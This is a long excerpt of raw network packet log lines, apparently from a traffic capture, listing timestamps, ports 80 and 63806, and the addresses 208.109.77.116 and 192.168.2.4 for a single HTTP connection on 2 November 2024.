                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186642885 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186659098 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186664104 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186671019 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186681032 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186683893 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186691999 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186703920 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186717033 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186721087 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186727047 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186732054 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186743975 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186757088 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186759949 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186780930 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186784029 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186822891 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186836004 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186845064 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186866999 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186877966 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186878920 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186919928 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186923981 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186932087 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.186959982 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187007904 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187017918 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187027931 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187038898 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187058926 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187072992 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187200069 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187210083 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187221050 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187233925 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187243938 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187243938 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187285900 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187386036 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187403917 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187416077 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187431097 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187464952 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187503099 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187514067 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187524080 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187535048 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187546968 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187549114 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187556982 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187567949 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187568903 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187580109 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187588930 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187602997 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187625885 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187649965 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187659979 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187683105 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187693119 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187700987 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187705994 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187731028 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187748909 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187824965 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187876940 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187917948 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187947989 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187961102 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187978983 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.187989950 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188007116 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188025951 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188066959 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188076019 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188085079 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188096046 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188106060 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188116074 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188117027 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188132048 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188138008 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188148975 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188157082 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188165903 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188175917 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188186884 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188189983 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188195944 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188205957 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188209057 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188216925 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188227892 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188240051 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188258886 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188268900 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188277960 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188287020 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188299894 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188309908 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188311100 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188321114 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188328028 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188332081 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188353062 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188380957 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188397884 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188406944 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188424110 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188435078 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188442945 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188452005 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188462019 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188481092 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188500881 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188503027 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188514948 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188553095 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188694000 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188705921 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188714981 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188743114 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188749075 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188760996 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188770056 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188786983 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188796997 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188803911 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188815117 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188822031 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188827038 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188838005 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188849926 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188855886 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188862085 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188865900 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188877106 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188888073 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188904047 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188931942 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188942909 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188958883 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188968897 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.188996077 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.189014912 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.226584911 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.226594925 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.226602077 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.226644039 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.226655960 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.226660967 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.226795912 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.226867914 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.231834888 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.231899023 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.231909037 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.231918097 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.231929064 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.231940031 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.231955051 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.231982946 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.232023954 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.232084036 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.232095003 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.232105017 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.232115030 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.232127905 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.232134104 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.232144117 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.232148886 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.232153893 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.232181072 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.232183933 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.232194901 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.232194901 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.232204914 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.232223034 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.232234955 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.232244968 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.232248068 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.232269049 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.232274055 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.232292891 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.232321024 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.232331038 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.232358932 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.276637077 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.280424118 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.280436039 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.280446053 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.280479908 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.306915998 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.306956053 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.306967020 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.306978941 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.306988955 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307005882 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307015896 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307028055 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307032108 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307038069 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307049990 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307060003 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307090044 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307100058 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307110071 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307137012 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307147026 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307188034 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307190895 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307190895 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307190895 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307198048 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307208061 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307219028 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307225943 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307235003 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307235956 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307246923 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307254076 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307301044 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307317019 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307328939 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307331085 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307339907 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307343006 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307368994 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307585001 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307595015 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307626009 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307722092 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307732105 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307743073 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307754040 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307758093 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307765961 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307777882 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307802916 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307830095 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307840109 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307890892 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307918072 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307928085 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307938099 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307949066 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307962894 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307981014 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.307986975 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308048010 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308088064 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308243990 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308307886 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308319092 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308362961 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308469057 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308479071 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308489084 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308499098 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308511019 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308511972 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308521032 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308532953 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308538914 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308543921 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308569908 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308573008 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308583975 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308620930 CET6380680192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308648109 CET8063806208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:12.308657885 CET8063806208.109.77.116192.168.2.4
